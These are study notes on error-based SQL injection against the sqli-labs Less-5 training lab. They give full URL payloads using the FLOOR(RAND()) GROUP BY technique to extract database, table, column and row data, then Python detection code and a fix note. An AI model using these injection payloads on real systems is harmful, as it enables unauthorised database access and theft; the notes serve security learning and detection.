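SQL Injection Study Notes (2): Error-Based

Error-based SQL injection method

1. Determine the submission type

String (character) type:

2. Construct the closure:

The closing character at this injection point is  '

3. Using the HackBar plugin, you can obtain the URL to request

Database name: security

Clicking database generates the statement that queries the database; copy and paste that statement into the URL to get the database name.

URL statement: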

http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+

Table name: emails

As above, click tables and enter the database name to get the statement that queries the table name.

URL statement:

http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(table_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+

Column name: id

URL statement:

http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20%20%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(column_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name=0x656d61696c73%20AND%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+

Data: 1

URL statement:

AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(id) AS CHAR),0x7e)) FROM security.emails LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
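
From the defender's side, the requests above share a recognisable shape (FLOOR(RAND(...)) combined with COUNT(*) and GROUP BY over INFORMATION_SCHEMA, with schema and table names passed as hex literals). The following is an added example, not part of the original notes, that flags that shape in request URLs and decodes the hex literals for triage; the host lab.example, the function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Markers of the FLOOR(RAND(0)*2) ... GROUP BY duplicate-key technique used above.
MARKERS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "info_schema": re.compile(r"information_schema\s*\.", re.I),
}
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2}){2,})", re.I)


def decode_hex_literals(value):
    """Turn MySQL hex string literals (0x...) into readable text for triage."""
    out = []
    for m in HEX_LITERAL.finditer(value):
        raw = bytes.fromhex(m.group(1))
        if all(32 <= b < 127 for b in raw):
            out.append(raw.decode("ascii"))
    return out


def inspect_request(url):
    """Return a finding dict for each query parameter matching the pattern."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = re.sub(r"/\*.*?\*/", " ", value)  # drop inline SQL comments
        hits = sorted(k for k, rx in MARKERS.items() if rx.search(value))
        # floor(rand()) plus grouping is the core; the rest raises confidence.
        if "floor_rand" in hits and "group_by" in hits:
            findings.append({"param": name, "markers": hits,
                             "hex_decoded": decode_hex_literals(value)})
    return findings


# Constructed sample requests (placeholder host), modelled on the Less-5 URLs above.
SAMPLES = [
    "http://lab.example/Less-5/?id=1",
    "http://lab.example/Less-5/?id=1%20%27%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),"
    "CONCAT((SELECT(SELECT%20CONCAT(CAST(table_name%20AS%20CHAR),0x7e))%20FROM%20"
    "INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=0x7365637572697479%20LIMIT%200,1),"
    "FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url[:40], inspect_request(url))
```

Matching on request logs only tells you the endpoint is being probed; the fix for the page itself is a parameterized query for the id parameter and not echoing database errors into the response.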
